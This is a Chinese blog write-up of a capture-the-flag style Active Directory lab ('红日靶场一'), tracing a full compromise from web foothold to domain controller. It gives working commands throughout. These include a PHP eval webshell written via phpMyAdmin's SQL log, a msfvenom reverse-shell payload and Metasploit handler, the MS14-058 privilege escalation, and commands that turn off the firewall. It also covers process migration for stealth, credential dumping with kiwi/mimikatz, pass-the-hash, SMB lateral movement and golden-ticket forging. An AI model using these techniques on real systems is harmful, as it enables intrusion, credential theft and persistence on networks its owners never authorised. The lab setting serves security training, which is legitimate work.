红日靶场一

前言

靶机地址:https://bdziyi.com/ulab/lab.html?page=target-detail&id=94

这是在无境开的,要会员,不过我强哥有,感谢我强哥

要是不想充会员,可以找其他免费的,好像有能下载到本地的虚拟机吧,我也懒得找来下了

或者是用灵境平台,好像也是免费的:https://xvshifu.github.io/xvsf/posts/hongri1/

WP:https://www.cnblogs.com/Afa1rs/p/18870098

靶场介绍

该环境与原版有差异,第一层提权请使用ms14-058,不提权也有方法直接正常横向域控

flag在域控的C根目录下flag.txt

一、漏洞利用

  1. 漏洞搜索与利用
  2. 后台Getshell上传技巧
  3. 系统信息收集
  4. 主机密码收集

二、内网搜集

  1. 内网–继续信息收集
  2. 内网攻击姿势–信息泄露
  3. 内网攻击姿势-MS08-067
  4. 内网攻击姿势-SMB远程桌面口令猜测
  5. 内网攻击姿势-Oracle数据库TNS服务漏洞
  6. 内网攻击姿势-RPC DCOM服务漏洞

三、横向移动

  1. 内网其它主机端口-文件读取
  2. 内网其它主机端口-redis
  3. 内网其它主机端口-redis Getshell
  4. 内网其它主机端口-MySQL数据库
  5. 内网其它主机端口-MySQL提权

四、构建通道

  1. 内网其它主机端口-代理转发

五、持久控制

  1. 域渗透-域成员信息收集
  2. 域渗透-基础服务弱口令探测及深度利用之powershell
  3. 域渗透-横向移动[wmi利用]
  4. 域渗透-C2命令执行
  5. 域渗透-利用DomainFronting实现对beacon的深度隐藏
  6. 域渗透-域控实现与利用

六、痕迹清理

  1. 日志清理

网络地址

1
2
目标地址:192.168.111.20
本机地址:192.168.111.25

打靶过程

信息收集

Tscan 扫一下,可以看到有 phpMyAdmin 服务

image-20260626154216588

Tscan 扫一下端口,存在 80、135、139、445、1025、1026、1027、1028、1029、1030、3306 这些端口

并且 445 这个端口还存在MS17010永恒之蓝

image-20260626154526142

先看 80 端口,网站首页

image-20260626153521855

Tscan 扫一下,有个 phpinfo.php 和 phpmyadmin

image-20260626154020711

访问:http://192.168.111.20/phpmyadmin/,可以弱口令 root/root 登录后台

image-20260626154727455

Web渗透

GetShell方法一:phpMyAdmin利用SQL日志写入一句话木马

查看日志位置

1
show variables like '%general%';

image-20260626155142144

  • general_log: OFF:表示 MySQL 的通用查询日志当前处于关闭状态,这意味着数据库目前不会记录所有执行过的 SQL 语句
  • general_log_file: C:\phpStudy\MySQL\data\stu1.log:表示如果开启通用日志,日志文件将会保存在该路径下

可以将general_log_file的路径改成C:\phpStudy\WWW\shell.phpC:\phpStudy\WWW是phpstudy映射到的网站目录,就是网站的根目录,这个目录下存在的shell.php可以直接通过访问http://192.168.111.20/shell.php访问到

然后将general_log设置为On,这样就可以让数据库记录所有执行过的 SQL 语句,保存的路径就是设置的C:\phpStudy\WWW\shell.php,这样就可以将一句话木马写入到shell.php

首先更改general_log_file

1
set global general_log_file="C:\\phpStudy\\WWW\\shell.php"

然后更改general_log

1
set global general_log="On"

此时再看一下日志位置,是修改成功了的

1
show variables like '%general%';

image-20260626160149011

然后写入一句话木马,可以通过select语句

1
select "<?php eval($_POST['shell']);?>"

image-20260626160524178

用蚁剑连一下shell.php试一试:http://192.168.111.20/shell.php,成功连接上

image-20260626160648709

查看当前用户是:god\administrator

image-20260626162548661

Getshell方法二:YXCMS利用创建前端模板文件创建后门

连接上后发现还有一个 yxcms

image-20260626160829852

image-20260626160903988

在公告信息可以得到默认的管理员账号密码:admin/123456

image-20260626161003743

访问http://192.168.111.20/yxcms/index.php?r=admin,可以利用默认的账号密码登录后台

image-20260626161303110

左侧导航栏找到“前台模板”,点击“管理模板文件”

image-20260626161446802

可以对文件进行编辑或者新建

image-20260626161525317

可以新建一个后门文件

image-20260626161615802

image-20260626161633859

然后就是要找到这个文件在哪里,存在robots.txt文件,其中有/data/protected

image-20260626161959155

可以找到那些文件是在:http://192.168.111.20/yxcms/protected/apps/default/view/default/

image-20260626162111580

也是成功连上蚁剑:http://192.168.111.20/yxcms/protected/apps/default/view/default/shell1.php

image-20260626162150129

也是god\administrator

image-20260626162527900

后渗透

上线msf

因为用的VPN连的靶机,同一时间只能连一个机器,这里就换成kali里做

生成木马

1
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.111.25 LPORT=5566 -f exe -o stageless.exe

image-20260626175825415

将木马文件stageless.exe传到靶机上

image-20260627142807217

在kali上开启监听

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.111.25
set lport 5566
run

image-20260626180215847

然后在蚁剑运行一下程序

1
.\stageless.exe

image-20260626180308917

成功上线 msf

image-20260626180357288

MS14-058(Windows 本地权限提升漏洞)

进行提权到 SYSTEM

1
2
3
4
5
6
7
8
9
background
use exploit/windows/local/ms14_058_track_popup_menu
set SESSION 1
set TARGET 1
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.111.25
set ReverseListenerBindAddress 0.0.0.0
set LPORT 5555
run

成功拿到了 SYSTEM 权限

image-20260627142955651

进入命令行

1
shell

image-20260627143406775

养成好习惯,关闭防火墙

1
netsh advfirewall set allprofiles state off

image-20260627170206437

上线CS

在 kali 里启动CS服务端,这里 IP 用的是连VPN的

1
./teamserver 192.168.111.25 123456

image-20260626173256731

启动客户端

1
java -Dfile.encoding=UTF-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Duser.language=en -javaagent:uHook.jar -jar cobaltstrike-client.jar $*

因为是kali本地的,这里Host可以直接用127.0.0.1

image-20260626173316641

image-20260626173331769

设置监听器

image-20260626173458111

image-20260626173519426

生成Windows版本的payload

image-20260626173553671

image-20260626173604042

将木马文件传到靶机上

image-20260627143635975

在 msf 中以 SYSTEM 身份执行程序,上线 CS

1
.\Windows.exe

image-20260627143731946

成功上线 CS

image-20260627143744892

信息收集

查看是否存在域(其实从之前看当前用户的时候就可以知道有域了,因为用户名是god\administrator,就是在god域中)

1
ipconfig /all

image-20260627143928169

看一下有几个域

1
net view /domain

只有一个 GOD

image-20260627144318227

看一下有哪些用户,还有一个 liukaifeng01 用户

1
net user

image-20260627143942352

并且是 administrators 组的

1
net localgroup administrators

image-20260627144013988

看一下域内主机有哪些

1
net view

image-20260627144159449

查询域内IP

1
arp -a

image-20260627144027314

可以通过 ping 域名来确定哪一个是域控主机的IP

1
ping owa.god.org

image-20260627144516460

1
ping root-tvi862ubeh.god.org

image-20260627144616870

1
ping stu1.god.org

image-20260627144704502

总结一下

  • 存在域,域名为 god

  • 有个管理员权限的用户 liukaifeng01

  • 域中有三台主机:

    域名 IP 域内身份
    stu1.god.org
    root-tvi862ubeh.god.org 192.168.52.141
    owa.god.org 192.168.52.138 域控

权限维持

利用 EXE 上线后,很容易在任务管理器中,或者使用 tasklist 被发现,可以将进程迁移到其他原有的进程上,就是寄生在别的进程上,这样就不会被发现了,达到了权限维持的目的,并且有一定的隐蔽性

首先在 metepreter 查看一下当前的进程

1
getpid

image-20260627145931011

这个stageless.exe的进程号就是2008,然后就是要将这个进程附加到系统进程上

先看一下系统进程的进程号

1
ps

image-20260627150527248

输入(migrate 进程号)命令可以将进程移动到指定进程里

1
migrate 3692

image-20260627150610421

如果不知道迁移到哪

输入run post/windows/manage/migrate系统自动会寻找指定的进程然后迁移

横向移动

用 Stowaway 做内网代理

笔记:https://yschen20.github.io/2025/04/25/%E5%86%85%E7%BD%91%E4%BB%A3%E7%90%86/

把 windows_x64_agent.exe 传到靶机上

image-20260627152503308

本地 kali 启动

1
./linux_x64_admin -l 9999

image-20260627160143152

然后靶机上执行命令

1
.\windows_x64_agent.exe -c 192.168.111.25:9999

image-20260627160127929

回到 kali 看到连接上了

image-20260627160158644

然后是做流量转发

1
2
use 0
socks 10000

image-20260627160220817

然后配置 kali 本地的/etc/proxychains4.conf文件

1
socks5 127.0.0.1 10000

然后可以测试一下,有响应就是成功了

1
proxychains curl -v http://192.168.52.138

image-20260627160420289

用 nmap 扫端口,这里会扫很长一段时间

1
proxychains4 nmap -sT --min-rate 10000 -p- 192.168.52.138

image-20260627161225216

太慢了,直接用别的大佬扫好的

还有192.168.52.141

尝试MS17010永恒之蓝

可以发现192.168.52.138的有445端口,可以尝试打永恒之蓝

1
2
3
4
5
6
7
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.52.138
set LHOST 192.168.111.25
set LPORT 9998
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

不过失败了,不存在这个漏洞

image-20260627162635286

哈希传递攻击拿下域控

msf

利用 msf 进行哈希传递攻击,抓取哈希值

1
hashdump

image-20260627163745356

使用 kiwi 这个工具,用法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
load kiwi             #加载kiwi模块
help kiwi     		  #查看kiwi模块的使用
creds_all             #列举所有凭据
creds_kerberos        #列举所有kerberos凭据
creds_msv             #列举所有msv凭据
creds_ssp             #列举所有ssp凭据
creds_tspkg           #列举所有tspkg凭据
creds_wdigest         #列举所有wdigest凭据
dcsync                #通过DCSync检索用户帐户信息
dcsync_ntlm           #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create  #创建黄金票据
kerberos_ticket_list  #列举kerberos票据
kerberos_ticket_purge #清除kerberos票据
kerberos_ticket_use   #使用kerberos票据
kiwi_cmd              #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam          #dump出lsa的SAM
lsa_dump_secrets      #dump出lsa的密文
password_change       #修改密码
wifi_list             #列出当前用户的wifi配置文件
wifi_list_shared      #列出共享wifi配置文件/编码

加载 kiwi 模块

1
load kiwi

image-20260627164037879

列举所有凭据

1
creds_all

image-20260627164121843

可以用下面这三个模块进行哈希传递

1
2
3
auxiliary/admin/smb/psexec_command  #在目标机器上执行系统命令
exploit/windows/smb/psexec          #用psexec执行系统命令
exploit/windows/smb/psexec_psh       #使用powershell作为payload

这里用exploit/windows/smb/psexec

1
2
3
4
5
6
7
msfconsole
use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser administrator
set smbpass 00000000000000000000000000000000:469d85e30803fcc042ec2c6254ee38ba
set smbdomain god
run

失败了

image-20260627164416621

CS

换成CS试试,之前上线过CS了,用CS的内置插件获取密码

image-20260627162917178

可以抓到 administrator 的 NTLM,还有明文密码

image-20260627163129570

先扫一下端口

image-20260627170734531

扫52这个网段的

image-20260627170810595

image-20260627171045649

点下面这个按钮切换一下形式,52网段的主机都有了

image-20260627171119000

内网横向

刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道。

  1. SMB监听隧道的核心原理是利用SMB协议在目标主机上建立隐蔽的通信通道,绕过传统防火墙和入侵检测系统的监控。
  2. SMB协议基础:文件共享,域名解析等,默认通过445端口通信

创建SMB监听器

image-20260627165011988

进行横向,用psexec

image-20260627171232425

配置一下

image-20260627171443560

成功把192.168.52.138上线CS

image-20260627171433638

养成好习惯,随手关防火墙

1
netsh advfirewall set allprofiles state off

image-20260627171617501

黄金票据

先抓取 HASH,主要是需要 krbtgt 的

1
hashdump

image-20260627172009449

还需要 SID

1
logonpasswords

image-20260627172719102

1
SID: S-1-5-20

然后就可以打黄金票据了

image-20260627172754480

配置一下,最后的HASH是抓取过的,直接选择即可

image-20260627172838951

成功了

image-20260627172913355

拿flag

1
type C:\flag.txt

image-20260627174825511

1
d1f91b655118d4bd5d9f9e237d840e50
渗透 > 无境 > 红日靶场
#内网渗透
红日靶场一
https://yschen20.github.io/2026/06/28/红日靶场一/
作者
Suzen
发布于
2026年6月28日
更新于
2026年6月28日
许可协议